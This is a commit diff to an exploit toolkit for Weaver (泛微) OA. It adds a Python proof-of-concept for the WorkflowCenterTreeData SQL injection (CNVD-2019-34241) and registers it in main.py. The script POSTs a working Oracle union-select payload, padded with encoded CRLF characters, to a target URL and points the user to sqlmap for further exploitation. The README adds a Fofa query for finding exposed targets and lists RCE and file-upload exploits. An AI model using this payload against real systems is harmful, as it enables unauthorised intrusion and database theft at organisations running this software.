Add WorkflowCenterTreeData_Sql

README.md

@@ -7,33 +7,31 @@
 
 泛微OA V8前台Sql注入
 
-泛微OA WorkflowServiceXml RCE
+泛微OA WorkflowServiceXml RCE CNVD-2019-32204
 
 泛微OA weaver.common.Ctrl 任意文件上传
 
 泛微OA Bsh RCE
+
+泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
 ```
 
 先写了这些，也欢迎补充～
 
 其中`/poc`下的利用脚本均可独立使用。
 
-##### Usage: 
+##### Usage:
 
 ```bash
 python3 main.py -f filename
 
 python3 main.py -u url
 ```
 
-
-
 ![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010147963.png)
 
 ![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010645469.png)
 
-
-
 ## 参考
 
 https://ailiqun.xyz/2021/05/02/%E6%B3%9B%E5%BE%AEOA-%E5%89%8D%E5%8F%B0GetShell%E5%A4%8D%E7%8E%B0/

main.py

@@ -6,7 +6,7 @@
 from pyfiglet import Figlet
 
 from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql, \
-    Weaver_Common_Ctrl_Upload, Bsh_RCE
+    Weaver_Common_Ctrl_Upload, Bsh_RCE, WorkflowCenterTreeData_Sql
 
 BLUE = '\033[0;36m'
 RED = '\x1b[1;91m'
@@ -84,6 +84,11 @@ def check(url):
     if Bsh_RCE.Check(url) == 'ok':
         result('泛微OA Bsh RCE', url)
 
+    # 泛微OA WorkflowCenterTreeData接口SQL注入
+    print(now_time() + info() + '正在检测泛微OA WorkflowCenterTreeData接口SQL注入漏洞')
+    if WorkflowCenterTreeData_Sql.exploit(url) == 'ok':
+        result('泛微OA WorkflowCenterTreeData接口SQL注入', url)
+
 
 if __name__ == '__main__':
     print(VIOLET + Figlet(font='slant').renderText('WeaverOAExp') + ENDC)

poc/Bsh_RCE.py

@@ -1,5 +1,5 @@
 # -*- coding: utf-8 -*-
-# 泛微OA Beanshell RCE漏洞
+# 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
 # Fofa:  app="泛微-协同办公OA"
 
 import requests

poc/WorkflowCenterTreeData_Sql.py

@@ -0,0 +1,66 @@
+# -*- coding: utf-8 -*-
+# 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
+# Fofa:  app="泛微-协同办公OA"
+
+import requests
+import sys
+import time
+
+BLUE = '\033[0;36m'
+RED = '\x1b[1;91m'
+YELLOW = '\033[33m'
+VIOLET = '\033[1;94m'
+GREEN = '\033[1;32m'
+BOLD = '\033[1m'
+ENDC = '\033[0m'
+
+
+def now_time():
+    return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC
+
+
+def info():
+    return VIOLET + "[INFO] " + ENDC
+
+
+def error():
+    return RED + "[ERROR] " + ENDC
+
+
+def success():
+    return GREEN + "[SUCCESS] " + ENDC
+
+
+def warning():
+    return YELLOW + "[WARNING] " + ENDC
+
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
+    'Accept-Language': 'zh-CN,zh;q=0.9',
+    'Content-Type': 'application/x-www-form-urlencoded'
+}
+
+
+def exploit(url):
+    target = url + 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
+    payload = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"
+    try:
+        requests.packages.urllib3.disable_warnings()
+        res = requests.post(url=target, data=payload, headers=headers, verify=False, timeout=10)
+        res.encoding = res.apparent_encoding
+        if '[' and 'id' in res.text:
+            print(now_time() + success() + '目标为oracle数据库, 可利用sqlmap进行进一步利用: {}'.format(target))
+            return 'ok'
+        else:
+            print(now_time() + warning() + '不存在泛微OA WorkflowCenterTreeData接口SQL注入')
+    except:
+        print(now_time() + error() + '未知错误')
+
+
+if __name__ == '__main__':
+    url = sys.argv[1]
+    if url[-1] != '/':
+        url += '/'
+    exploit(url)